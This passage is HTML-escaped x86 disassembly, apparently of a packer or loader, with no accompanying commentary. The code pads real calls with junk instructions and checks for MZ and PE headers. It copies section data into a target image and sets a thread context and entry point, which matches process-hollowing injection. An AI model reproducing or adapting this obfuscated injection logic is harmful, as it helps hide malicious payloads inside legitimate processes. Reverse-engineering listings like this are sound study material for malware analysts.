/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,1E&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;al,cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sar&amp;nbsp;&amp;nbsp;&amp;nbsp;al,0F&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,0E&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,01&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;ax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416D40&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;004010EF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,0B&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,11&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416D64&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;004010EF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;nop&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,FF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,14&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;cx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;ax,001A&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,0000009E&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416D88&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;004010EF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,91&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,14&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;al,01&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;ax,1B&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,02&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,17&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,14&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;al,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,09&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;al,cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,0E&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416DAC&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;004010EF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;cx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sar&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,01&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;al&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,0F&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,07&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,13&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;ax,bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;al,bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,cx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416DD0&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;004010EF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp],00416DF4&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;004010EF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp,00416F5C&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;004010EF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;esi,[00413018]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416CB0&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416D1C&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004183CC],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+10],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;ax,0001&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sar&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,14&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;al,09&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,0B&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,17&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;al&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;ax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,0E&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;al&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004183CC]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00413014]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00417D68],00000044&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00417A90],00010007&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;word ptr [edi],5A4D&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004183C8],edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jnz&amp;nbsp;&amp;nbsp;&amp;nbsp;00401773&lt;br /&gt;&lt;br /&gt;l00401698:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;esi,[edi+3C]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;esi,edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esi],00004550&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jnz&amp;nbsp;&amp;nbsp;&amp;nbsp;00401773&lt;br /&gt;&lt;br /&gt;l004016A9:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00417EB0&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00417D68&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;00401337&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esp+1C]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esi+34]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00417EB0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;0040131D&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esi+50]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esi+34]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00417EB0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;004012F6&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esi+54]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [esi+34]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00417EB0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;00401366&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp,ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;esp,34&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;word ptr [esi+06],bp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jbe&amp;nbsp;&amp;nbsp;&amp;nbsp;0040173D&lt;br /&gt;&lt;br /&gt;l004016FD:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[004183C8]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[eax+3C]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;lea&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[eax+edi+000000F8]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [eax+10]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,[eax+14]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00417A7C],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[eax+0C]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[esi+34]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00417EB0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;00401366&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;movzx&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,word ptr [esi+06]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;esp,10&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp,28&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jl&amp;nbsp;&amp;nbsp;&amp;nbsp;004016FD&lt;br /&gt;&lt;br /&gt;l0040173D:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;edi,00417A90&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00417EB4]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;0040138C&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[esi+28]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[esi+34]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00417EB4]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00417B40],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;004013A8&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00417EB4]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;004013C4&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;esp,14&lt;br /&gt;&lt;br /&gt;l00401773:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret&lt;br /&gt;&lt;br /&gt;fn00401779()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,07&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;al,03&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416CB0&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00413018]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;edi,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,FF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;esi,[00413014]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416E3C&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004183D4],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,15&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416E60&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004184DC],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,06&lt;br 